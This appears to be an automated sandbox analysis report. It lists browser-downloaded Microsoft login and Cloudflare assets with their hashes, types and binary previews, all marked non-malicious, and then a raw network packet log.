                                                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                      Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                      Category:dropped
                                                                                      Size (bytes):17174
                                                                                      Entropy (8bit):2.9129715116732746
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                      Category:dropped
                                                                                      Size (bytes):116343
                                                                                      Entropy (8bit):7.997640489040715
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                      MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                      SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                      SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                      SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                      Category:dropped
                                                                                      Size (bytes):17174
                                                                                      Entropy (8bit):2.9129715116732746
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):3.990210155325004
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                      Category:downloaded
                                                                                      Size (bytes):49954
                                                                                      Entropy (8bit):7.99493321471063
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                      MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                      SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                      SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                      SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js
                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):48316
                                                                                      Entropy (8bit):5.6346993394709
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                      Category:dropped
                                                                                      Size (bytes):1435
                                                                                      Entropy (8bit):7.8613342322590265
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                      Category:downloaded
                                                                                      Size (bytes):61052
                                                                                      Entropy (8bit):7.996159932827634
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                      MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                      SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                      SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                      SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                      Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):6
                                                                                      Entropy (8bit):2.584962500721156
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:fCu:au
                                                                                      MD5:AAAB7A355103063D9EEB4824A3A6B374
                                                                                      SHA1:E51555F02C32321F3E48F07A0FA5AF46DF835BFC
                                                                                      SHA-256:79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
                                                                                      SHA-512:D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://fpt.live.com/Images/Clear.PNG?ctx=jscb1.0&session_id=4b4b65bbb1a545718e7d4510916c1a9e&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&esi=YnVhPU1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTcuMC4wLjAgU2FmYXJpLzUzNy4zNiZvcz1XaW4zMiZscHJvYz00Jm9sPXRydWUmcnR0PTE1MCZjaHJtPXRydWUmcHJvc3ViPTIwMDMwMTA3JmV2YWw9MzMmYXBwdj01LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2JmxzPXRydWUmZG09OCZtdHA9MCZuYz03NCZwcj0xJnNyPTEyODB4MTAyNCZzY2Q9MjQmYXNyPTEyODB4OTg0JnR6PS0zMDAmZHN0PTYwJnR6bz0tMzAwJmJsPWVuLVVTJm10aD0yN2Y1MWQzMTQ5ZTZiZjIwOWI2NmJkMzg3YjBhZjNjNCZtdG49MiZwbj01JnBoPWYzYWMyMmFjNTljNmRjYjg3NDEwOWQwOTNjNTI1NWU4JnA9cGx1Z2luX2ZsYXNoJTNEZmFsc2UlMjZwbHVnaW5fd2luZG93c19tZWRpYV9wbGF5ZXIlM0RmYWxzZSUyNnBsdWdpbl9hZG9iZV9hY3JvYmF0JTNEZmFsc2UlMjZwbHVnaW5fc2lsdmVybGlnaHQlM0RmYWxzZSUyNnBsdWdpbl9xdWlja3RpbWUlM0RmYWxzZSUyNnBsdWdpbl9zaG9ja3dhdmUlM0RmYWxzZSUyNnBsdWdpbl9yZWFscGxheWVyJTNEZmFsc2UlMjZwbHVnaW5fdmxjX3BsYXllciUzRGZhbHNlJTI2cGx1Z2luX2RldmFsdnIlM0RmYWxzZSUyNnBsdWdpbl9zdmdfdmlld2VyJTNEZmFsc2UlMjZwbHVnaW5famF2YSUzRGZhbHNlJmZoPTJhMjk4NDlhZjA3ZGQxNjFkZGM3MzA0MGJlMjVmM2YwJmZuPTExMiZsaD1odHRwcyUzQSUyRiUyRmZwdC5saXZlLmNvbSUyRiUzRnNlc3Npb25faWQlM0Q0YjRiNjViYmIxYTU0NTcxOGU3ZDQ1MTA5MTZjMWE5ZSUyNkN1c3RvbWVySWQlM0QzM2UwMTkyMS00ZDY0LTRmOGMtYTA1NS01YmRhZmZkNWUzM2QlMjZQYWdlSWQlM0RTVSZkcj1odHRwcyUzQSUyRiUyRnNpZ251cC5saXZlLmNvbSUyRiZ3PThERDMwNjNDM0E4RDVBNSZpZD1hY2NkNGUxZS1mOWEzLTVlM2UtYzk2NC04ZWQzNGViY2Q4MjMmYT0mYz1iMGVhZGI5MzQxNjZiNjk2MDdiODI1OTIyMzM2MTc2ZA==&eci=eyJ1dmRyIjoiR29vZ2xlIEluYy4gKEdvb2dsZSkiLCJ1cmRyIjoiQU5HTEUgKEdvb2dsZSwgVnVsa2FuIDEuMy4wIChTd2lmdFNoYWRlciBEZXZpY2UgKFN1Ynplcm8pICgweDAwMDBDMERFKSksIFN3aWZ0U2hhZGVyIGRyaXZlcikiLCJ2ZHIiOiJXZWJLaXQiLCJyZHIiOiJXZWJLaXQgV2ViR0wiLCJpZHVoIjoiMTViNmNhNDcyNjliZTQyODc1Njg1MDY5MzdlOTkxN2MifQ==&PageId=SU&u1=&u3=10.0.0&u4=x86&u5=64&u2=(Google%20Chrome%2C117.0.5938.132)%2C(Not%3BA%3DBrand%2C8.0.0.0)%2C(Chromium%2C117.0.5938.132)
                                                                                      Preview:dfp:OK
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):3.990210155325004
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                      Category:downloaded
                                                                                      Size (bytes):1435
                                                                                      Entropy (8bit):7.8613342322590265
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
                                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                      No static file info
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 9, 2025 05:10:55.911837101 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.911860943 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.911917925 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.912210941 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.912218094 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.912554979 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.912573099 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:55.912642956 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.913093090 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:55.913101912 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.119879007 CET49673443192.168.2.16204.79.197.203
                                                                                      Jan 9, 2025 05:10:56.402147055 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.402158022 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.402542114 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.402554035 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.402605057 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.402616978 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.403409958 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.403460979 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.403476000 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.403511047 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404421091 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404462099 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404485941 CET44349708188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.404536963 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404589891 CET49708443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404824972 CET49709443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404870033 CET44349709188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.404939890 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404939890 CET49709443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404958010 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404985905 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.404999971 CET44349707188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.405047894 CET49707443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.405143023 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.405159950 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.405215025 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.405301094 CET49709443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.405314922 CET44349709188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.405409098 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.405417919 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.422614098 CET49673443192.168.2.16204.79.197.203
                                                                                      Jan 9, 2025 05:10:56.866575003 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.866875887 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.866890907 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.867767096 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.867825985 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.868726969 CET49710443192.168.2.16188.114.96.3
                                                                                      Jan 9, 2025 05:10:56.868776083 CET44349710188.114.96.3192.168.2.16
                                                                                      Jan 9, 2025 05:10:56.868999958 CET49710443192.168.2.16188.114.96.3
